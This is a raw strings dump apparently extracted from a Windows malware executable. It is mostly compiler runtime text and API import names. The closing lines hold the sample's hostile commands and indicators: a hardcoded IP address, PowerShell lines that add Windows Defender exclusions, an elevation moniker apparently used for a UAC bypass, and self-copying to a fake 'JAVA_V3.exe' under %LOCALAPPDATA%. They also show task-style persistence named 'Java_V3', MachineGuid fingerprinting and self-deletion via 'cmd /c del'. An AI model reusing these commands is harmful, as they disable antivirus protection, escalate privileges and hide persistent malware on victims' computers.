!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
D$0jDj
QQSVWd
URPQQhPH@
UQPXY]Y[
j0Z9^4t
j0Z9^4t
j0Z9^4t
vj*Xf;
=j*Xf;
<ItC<Lt3<Tt#<h
A<lt'<tt
Tt)jhZf;
JjlZf;
8^8tb9^4~]
SVWjA_
V.jx_f;
V +V4+
F.jgYf;
PRRRRR
YYh,rA
M,j"^QRRRRR
Vj0XPW
M$j"^QRRRRR
j"[VWWWW
uSSSSj
f9:t!V
QQSVj8j@
^PQQQQQ
E ^PQQQQ
CY< u
PVVVVV
PPPPPPPP
PPPPPWV
PP9E u PPSWP
PVVVVV
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
Unknown exception
bad exception
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
(null)
CorExitProcess
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
1#QNAN
1#SNAN
?5Wg4p
%S#[k =
"B <1=
_hypot
_nextafter
Lksoei327fuajsp20
!= S_OKAY
GetSystemDefaultUILanguage
GetModuleFileNameW
GetLocaleInfoW
GetComputerNameExW
GetProcessHeap
ExpandEnvironmentStringsW
CloseHandle
CreateProcessW
EnterCriticalSection
LeaveCriticalSection
CreateMutexW
GetLastError
HeapAlloc
ExitProcess
GetCurrentProcess
CreateDirectoryW
CopyFileW
WaitForSingleObject
ReleaseMutex
GetLocalTime
SetProcessPriorityBoost
SetPriorityClass
GetShortPathNameW
GetEnvironmentVariableW
HeapFree
WriteFile
CreateFileW
CreateThread
KERNEL32.dll
GetTokenInformation
OpenProcessToken
RegGetValueW
RegOpenKeyExW
RegCloseKey
RegSetValueExW
RegCreateKeyExW
GetUserNameW
ADVAPI32.dll
SHChangeNotify
ShellExecuteExW
SHELL32.dll
CoUninitialize
CoInitializeEx
CoGetObject
CoInitialize
CoCreateInstance
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
PathStripPathW
SHLWAPI.dll
WSAStringToAddressW
WS2_32.dll
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
GetModuleHandleW
TerminateProcess
LocalFree
RaiseException
RtlUnwind
SetLastError
DeleteCriticalSection
EncodePointer
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
GetStdHandle
GetModuleHandleExW
GetFileType
LCMapStringW
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
GetStringTypeW
GetFileSizeEx
SetFilePointerEx
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
HeapSize
HeapReAlloc
DecodePointer
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_com_error@@
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
A0F0P0j0
3E3N3z3
4K4S4f4
475@5T5[5c5
656Y6d6
=!=&=0=;=K=i={=
>*>5>?>S>X>h>q>z>0?A?I?a?j?s?y?
4&4>4G4P4V4\4
828=8P8W8q8%9>9|9
:%:+:C:
;<;S;b;v;~;
>-?H?}?
3"3(3.343:3@3U3j3q3w3
5F5l5u5{5
5Z6s6}6
:":+:6:>:H:S:\:b:
;#;1;7;F;P;c;l;w;~;
< <&<0<:<J<Z<j<s<
=6=D=[=m=}=
9 9R9s9
:7:H:T:p:
8'9;9M9x9
:#:(:C:M:Y:^:c:~:
=+>0>4>8><>
C1J1g1k1o1s1w1
8_8|8<:Z:
:&=@=O=]=i=u=
>(>6>A>W>k>
0 0.0:0M0U0[0d0y0
4L5g5y5
586`6{6
747;7G7_7d7p7u7
949t9z9
=$>i>m>u>
?,?J?c?h?
4%484h4
4C5I5i5
6B8L8s8}8
<0<C<]<q<
=2=`=o=
>*>7>[>e>
1$1)1.1V1o1}1
2'2X2p2
3"32373<3W3f3q3v3{3
52595P5f5s5x5
5H6b6g6'9
>)?1?7?
4(424?4I4Y4
7)8u8~8
>,>_>o>
0O0^0l0
2#252G2Y2k2}2
3.3@3R3t475
7 8X8o8
92:P:n:
;h;o;v;};
0w9;:q:x:
6<6Q6[6
6-7<7r7
>'>4>d>
:.;8;S;
<I<Q<Y<a<i<
2K3L4\4m4u4
5Q5`5l5{5
5<6E6N6W6
8 8>8D8
=%=;=C=
<1?2o2
2 2024282
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6D<H<L<d<h<l<
`1d1h1l1p1t1x1|1
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3H3
6P<T<X<\<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
8$8,848<8D8L8T8\8d8l8t8|8
<T?X?`?
0 0$0,0D0T0X0h0l0p0x0
242@2`2h2p2x2
303<3D3l3p3
4L4P4p4
585X5x5
686X6x6
787X7t7x7
jjjjjj
jjjjjjj
jjjjjj
Aapi-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
(null)
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
Aapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-win-core-fibers-l1-1-0
ext-ms-
Aja-JP
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
64.94.85.117
%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "Add-MpPreference -ExclusionPath "%ws"; Add-MpPreference -ExclusionProcess "%ws"; exit"
rundll32.exe
cmd.exe
powershell.exe "Add-MpPreference -ExclusionPath "%ws"; exit"
Elevation:Administrator!new:
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
feogvduvixnsjoxskocxa
C:\Windows\explorer.exe
%LOCALAPPDATA%
\sdkwifhsyaunfs
\JAVA_V3.exe
diohfe92fh8sja9fwjs
e32i8f9wj2dsu8dhjfsi
SOFTWARE\Microsoft\Cryptography
MachineGuid
Softina
2005-01-01T12:05:00
Java_V3
%WINDIR%\System32\rundll32.exe
rundll32 "%ws" d
%WINDIR%\System32\cmd.exe
%ws /c "%ws"
%02d.%02d.%02d
Software\Softina
COMSPEC
/c del
> nul